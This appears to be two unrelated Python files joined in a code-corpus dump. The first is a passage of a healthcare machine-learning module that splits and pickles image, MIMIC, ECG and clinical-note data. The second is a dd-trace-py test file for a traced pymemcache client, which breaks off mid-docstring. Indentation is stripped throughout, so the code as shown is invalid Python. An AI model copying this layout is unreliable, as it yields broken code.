        ----------
        expdata_id : str
            name (ID) of the current experiment
        root_dir : str, optional (default='.')
            root directory under which 'experiments_data/<expdata_id>' is stored
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for CMS'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
        sel_task : str, optional (default='diagnose')
            name of the current healthcare task
        shuffle : bool, optional (default=True)
            whether to shuffle the data
        split_ratio : list, optional (default=[0.64, 0.16, 0.2])
            used to split the whole data into train/valid/test
        data_root : str (default='')
            directory containing the data; must be provided (an empty string raises an exception)
        n_limit : int, optional (default=-1)
            sample only the first N records; if n_limit == -1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
            'ratio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
            fetch k samples to show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
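# Hedged usage sketch for the imagedata class above; expdata_id and data_root are
# placeholders, and this helper is illustrative only (it is never called on import).
def _example_imagedata_workflow(data_root='./datasets/image'):
    expdata = imagedata(expdata_id='example.image.test')
    expdata.get_exp_data(sel_task='diagnose', data_root=data_root)
    expdata.load_exp_data()
    expdata.show_data(k=3)
    return expdata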
class sequencedata:
def __init__(self, expdata_id, root_dir='.'):
"""
        experiment data generator class for sequence (MIMIC) datasets
        Parameters
        ----------
        expdata_id : str
            name (ID) of the current experiment
        root_dir : str, optional (default='.')
            root directory under which 'experiments_data/<expdata_id>' is stored
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for MIMIC'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='phenotyping',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
        sel_task : str, optional (default='phenotyping')
            name of the current healthcare task
        shuffle : bool, optional (default=True)
            whether to shuffle the data
        split_ratio : list, optional (default=[0.64, 0.16, 0.2])
            used to split the whole data into train/valid/test
        data_root : str (default='')
            directory containing the data; must be provided (an empty string raises an exception)
        n_limit : int, optional (default=-1)
            sample only the first N records; if n_limit == -1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
seq_l, feat_n_all = pd.read_csv(concrete_path).shape
if seq_l < 2:
continue
all_list.append([concrete_path] + [seq_l] + row[1:].astype(float).tolist())
label_n = len(row[1:])
feat_n = feat_n_all - 1
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
l_list = []
for item in all_list:
x_list.append(item[0])
l_list.append(item[1])
y_list.append(np.array(item[2:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
training_l = l_list[: int(train_ratio * N)]
validing_l = l_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_l = l_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
pickle.dump(training_l, open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'wb'))
pickle.dump(validing_l, open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'wb'))
pickle.dump(testing_l, open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'wb'))
print ('finished L generate')
expdata_statistic = {
'task':self.sel_task,
            'ratio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
training_l = pickle.load(open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'rb'))
validing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'rb'))
testing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
            fetch k samples to show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('l_data', self.train['l'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('l_data', self.valid['l'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
print('l_data', self.test['l'][:k])
class ecgdata:
def __init__(self, expdata_id, root_dir='.'):
"""
        experiment data generator class for ECG datasets
        Parameters
        ----------
        expdata_id : str
            name (ID) of the current experiment
        root_dir : str, optional (default='.')
            root directory under which 'experiments_data/<expdata_id>' is stored
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for ECG'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
        sel_task : str, optional (default='diagnose')
            name of the current healthcare task
        shuffle : bool, optional (default=True)
            whether to shuffle the data
        split_ratio : list, optional (default=[0.64, 0.16, 0.2])
            used to split the whole data into train/valid/test
        data_root : str (default='')
            directory containing the data; must be provided (an empty string raises an exception)
        n_limit : int, optional (default=-1)
            sample only the first N records; if n_limit == -1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
feat_seq = pickle.load(open(os.path.join(data_root, 'x_data', 'feat.pkl'), 'rb'))
label_seq = pickle.load(open(os.path.join(data_root, 'y_data', self.sel_task + '.pkl'), 'rb'))
label_n = np.shape(label_seq)[1]
feat_n = np.shape(feat_seq)[1]
for cur_i, each_label in enumerate(label_seq):
all_list.append(each_label.tolist() + feat_seq[cur_i].tolist())
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(np.array(item[label_n:]).astype(float))
y_list.append(np.array(item[:label_n]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
            'ratio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
            fetch k samples to show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
class textdata:
def __init__(self, expdata_id, root_dir='.'):
"""
        experiment data generator class for clinical notes datasets
        Parameters
        ----------
        expdata_id : str
            name (ID) of the current experiment
        root_dir : str, optional (default='.')
            root directory under which 'experiments_data/<expdata_id>' is stored
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for Clinical Notes'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
        sel_task : str, optional (default='diagnose')
            name of the current healthcare task
        shuffle : bool, optional (default=True)
            whether to shuffle the data
        split_ratio : list, optional (default=[0.64, 0.16, 0.2])
            used to split the whole data into train/valid/test
        data_root : str (default='')
            directory containing the data; must be provided (an empty string raises an exception)
        n_limit : int, optional (default=-1)
            sample only the first N records; if n_limit == -1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
            'ratio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
            fetch k samples to show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
if __name__ == '__main__':
print ('hello world')
test_txt = textdata('test.1.text')
test_txt.get_exp_data(sel_task='diagnose',data_root = './datasets/text')
test_txt.load_exp_data() |
tests/contrib/pymemcache/test_client.py | p7g/dd-trace-py | 308 | 12748161 | # 3p
import pymemcache
from pymemcache.exceptions import MemcacheClientError
from pymemcache.exceptions import MemcacheIllegalInputError
from pymemcache.exceptions import MemcacheServerError
from pymemcache.exceptions import MemcacheUnknownCommandError
from pymemcache.exceptions import MemcacheUnknownError
import pytest
# project
from ddtrace import Pin
from ddtrace.contrib.pymemcache.client import WrappedClient
from ddtrace.contrib.pymemcache.patch import patch
from ddtrace.contrib.pymemcache.patch import unpatch
from ddtrace.vendor import wrapt
from tests.utils import DummyTracer
from tests.utils import TracerTestCase
from .test_client_mixin import PYMEMCACHE_VERSION
from .test_client_mixin import PymemcacheClientTestCaseMixin
from .test_client_mixin import TEST_HOST
from .test_client_mixin import TEST_PORT
from .utils import MockSocket
from .utils import _str
_Client = pymemcache.client.base.Client
class PymemcacheClientTestCase(PymemcacheClientTestCaseMixin):
"""Tests for a patched pymemcache.client.base.Client."""
def test_patch(self):
assert issubclass(pymemcache.client.base.Client, wrapt.ObjectProxy)
client = self.make_client([])
self.assertIsInstance(client, wrapt.ObjectProxy)
def test_unpatch(self):
unpatch()
from pymemcache.client.base import Client
self.assertEqual(Client, _Client)
def test_set_get(self):
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
self.check_spans(2, ["set", "get"], ["set key", "get key"])
def test_append_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.append(b"key", b"value", noreply=False)
assert result is True
self.check_spans(1, ["append"], ["append key"])
def test_prepend_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.prepend(b"key", b"value", noreply=False)
assert result is True
self.check_spans(1, ["prepend"], ["prepend key"])
def test_cas_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is True
self.check_spans(1, ["cas"], ["cas key"])
def test_cas_exists(self):
client = self.make_client([b"EXISTS\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is False
self.check_spans(1, ["cas"], ["cas key"])
def test_cas_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is None
self.check_spans(1, ["cas"], ["cas key"])
def test_delete_exception(self):
client = self.make_client([Exception("fail")])
def _delete():
client.delete(b"key", noreply=False)
pytest.raises(Exception, _delete)
spans = self.check_spans(1, ["delete"], ["delete key"])
self.assertEqual(spans[0].error, 1)
def test_flush_all(self):
client = self.make_client([b"OK\r\n"])
result = client.flush_all(noreply=False)
assert result is True
self.check_spans(1, ["flush_all"], ["flush_all"])
def test_incr_exception(self):
client = self.make_client([Exception("fail")])
def _incr():
client.incr(b"key", 1)
pytest.raises(Exception, _incr)
spans = self.check_spans(1, ["incr"], ["incr key"])
self.assertEqual(spans[0].error, 1)
def test_get_error(self):
client = self.make_client([b"ERROR\r\n"])
def _get():
client.get(b"key")
pytest.raises(MemcacheUnknownCommandError, _get)
spans = self.check_spans(1, ["get"], ["get key"])
self.assertEqual(spans[0].error, 1)
def test_get_unknown_error(self):
client = self.make_client([b"foobarbaz\r\n"])
def _get():
client.get(b"key")
pytest.raises(MemcacheUnknownError, _get)
self.check_spans(1, ["get"], ["get key"])
def test_gets_found(self):
client = self.make_client([b"VALUE key 0 5 10\r\nvalue\r\nEND\r\n"])
result = client.gets(b"key")
assert result == (b"value", b"10")
self.check_spans(1, ["gets"], ["gets key"])
def test_touch_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.touch(b"key", noreply=False)
assert result is False
self.check_spans(1, ["touch"], ["touch key"])
def test_set_client_error(self):
client = self.make_client([b"CLIENT_ERROR some message\r\n"])
def _set():
client.set("key", "value", noreply=False)
pytest.raises(MemcacheClientError, _set)
spans = self.check_spans(1, ["set"], ["set key"])
self.assertEqual(spans[0].error, 1)
def test_set_server_error(self):
client = self.make_client([b"SERVER_ERROR some message\r\n"])
def _set():
client.set(b"key", b"value", noreply=False)
pytest.raises(MemcacheServerError, _set)
spans = self.check_spans(1, ["set"], ["set key"])
self.assertEqual(spans[0].error, 1)
def test_set_key_with_space(self):
client = self.make_client([b""])
def _set():
client.set(b"key has space", b"value", noreply=False)
pytest.raises(MemcacheIllegalInputError, _set)
spans = self.check_spans(1, ["set"], ["set key has space"])
self.assertEqual(spans[0].error, 1)
def test_quit(self):
client = self.make_client([])
result = client.quit()
assert result is None
self.check_spans(1, ["quit"], ["quit"])
def test_replace_not_stored(self):
client = self.make_client([b"NOT_STORED\r\n"])
result = client.replace(b"key", b"value", noreply=False)
assert result is False
self.check_spans(1, ["replace"], ["replace key"])
def test_version_success(self):
client = self.make_client([b"VERSION 1.2.3\r\n"], default_noreply=False)
result = client.version()
assert result == b"1.2.3"
self.check_spans(1, ["version"], ["version"])
def test_stats(self):
client = self.make_client([b"STAT fake_stats 1\r\n", b"END\r\n"])
result = client.stats()
if PYMEMCACHE_VERSION >= (3, 4, 0):
assert client.sock.send_bufs == [b"stats\r\n"]
else:
assert client.sock.send_bufs == [b"stats \r\n"]
assert result == {b"fake_stats": 1}
self.check_spans(1, ["stats"], ["stats"])
def test_service_name_override(self):
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
Pin.override(client, service="testsvcname")
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.get_spans()
self.assertEqual(spans[0].service, "testsvcname")
self.assertEqual(spans[1].service, "testsvcname")
class PymemcacheHashClientTestCase(PymemcacheClientTestCaseMixin):
"""Tests for a patched pymemcache.client.hash.HashClient."""
def make_client_pool(self, hostname, mock_socket_values, serializer=None, **kwargs):
mock_client = pymemcache.client.base.Client(hostname, serializer=serializer, **kwargs)
tracer = DummyTracer()
Pin.override(mock_client, tracer=tracer)
mock_client.sock = MockSocket(mock_socket_values)
client = pymemcache.client.base.PooledClient(hostname, serializer=serializer)
client.client_pool = pymemcache.pool.ObjectPool(lambda: mock_client)
return mock_client
def make_client(self, mock_socket_values, **kwargs):
from pymemcache.client.hash import HashClient
tracer = DummyTracer()
Pin.override(pymemcache, tracer=tracer)
self.client = HashClient([(TEST_HOST, TEST_PORT)], **kwargs)
for _c in self.client.clients.values():
_c.sock = MockSocket(list(mock_socket_values))
return self.client
def test_patched_hash_client(self):
client = self.make_client([b"STORED\r\n"])
if PYMEMCACHE_VERSION >= (3, 2, 0):
assert client.client_class == WrappedClient
assert len(client.clients)
for _c in client.clients.values():
assert isinstance(_c, wrapt.ObjectProxy)
def test_delete_many_found(self):
"""
        delete_many internally calls client.delete, so we expect to get
        `delete` as our span resource.
        For base.Client, self.delete() is called, which bypasses our tracing
        on delete().
"""
